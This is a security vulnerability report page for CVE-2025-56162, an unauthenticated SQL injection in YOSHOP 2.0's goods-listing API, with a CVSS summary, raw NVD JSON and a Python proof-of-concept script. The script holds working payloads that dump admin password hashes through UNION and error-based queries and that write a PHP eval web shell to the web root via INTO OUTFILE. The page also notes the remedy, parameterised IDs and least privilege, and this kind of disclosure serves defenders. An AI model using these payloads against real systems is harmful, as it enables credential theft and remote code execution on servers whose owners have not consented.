Security Vulnerability Report
CVE-2025-56162 CVSS 6.5 MEDIUM

CVE-2025-56162

Published: 2025-10-02 16:15:35
Last Modified: 2025-10-30 18:33:11

Description

YOSHOP 2.0 suffers from an unauthenticated SQL injection in the goodsIds parameter of the /api/goods/listByIds endpoint. The getListByIds function concatenates user input into orderRaw('field(goods_id, ...)') without parameterization, allowing attackers to: (a) enumerate or modify database data, including dumping admin password hashes; (b) write web-shell files or invoke xp_cmdshell, leading to remote code execution on servers where the database account holds sufficient privileges (for example the FILE privilege needed to write files). Fixing the injection at the source — binding goodsIds as a validated list of integer IDs rather than interpolating it into the raw ORDER BY clause — removes the whole class; running the application's DB account with least privilege limits the impact of (b).

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:yiovo:firefly_mall:*:*:*:*:open_source:*:*:* - VULNERABLE
YOSHOP 2.0 (the NVD CPE match lists the product as yiovo firefly_mall and marks versions from 2.01 upward as affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-56162 - YOSHOP 2.0 SQL Injection PoC # Vulnerability: Unauthenticated SQL Injection in goodsIds parameter # Endpoint: /api/goods/listByIds # Method: GET import requests target_url = "http://target.com" endpoint = "/api/goods/listByIds" # Payload 1: Basic SQL Injection to test the vulnerability payload_basic = "1) AND 1=1-- -" # Payload 2: UNION-based injection to extract admin password hash payload_union = "1) UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,group_concat(username,0x3a,password) FROM yoshop_user-- -" # Payload 3: Error-based injection payload_error = "1) AND extractvalue(1,concat(0x7e,(SELECT password FROM yoshop_user LIMIT 1)))-- -" # Payload 4: Time-based blind injection payload_time = "1) AND IF(1=1,SLEEP(5),0)-- -" # Payload 5: Write WebShell via INTO OUTFILE (requires FILE privilege) payload_shell = "1) UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,'<?php @eval($_POST[\"cmd\"]);?>' INTO OUTFILE '/var/www/html/shell.php'-- -" # Send exploit request def exploit(target, payload): params = {"goodsIds": payload} try: resp = requests.get(target + endpoint, params=params, timeout=10) print(f"[+] Status: {resp.status_code}") print(f"[+] Response: {resp.text[:500]}") return resp except Exception as e: print(f"[-] Error: {e}") return None # Run exploitation print("[*] Testing basic injection...") exploit(target_url, payload_basic) print("\n[*] Extracting admin credentials...") exploit(target_url, payload_union) print("\n[*] Attempting WebShell upload...") exploit(target_url, payload_shell)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-56162", "sourceIdentifier": "[email protected]", "published": "2025-10-02T16:15:35.047", "lastModified": "2025-10-30T18:33:10.513", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "YOSHOP 2.0 suffers from an unauthenticated SQL injection in the goodsIds parameter of the /api/goods/listByIds endpoint. The getListByIds function concatenates user input into orderRaw('field(goods_id, ...)'), allowing attackers to: (a) enumerate or modify database data, including dumping admin password hashes; (b) write web-shell files or invoke xp_cmdshell, leading to remote code execution on servers configured with sufficient DB privileges."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:yiovo:firefly_mall:*:*:*:*:open_source:*:*:*", "versionStartIncluding": "2.01", "matchCriteriaId": "3D9A314C-46D3-418D-AFAF-93394EFCFF32"}]}]}], "references": [{"url": "https://gitee.com/xany/yoshop2.0", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/ZyWAC/CVE-Disclosures/blob/6b337a44934ffe948275995e9b79158e97c78fc4/2025/YOSHOP2.0/CVE-2025-56162.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}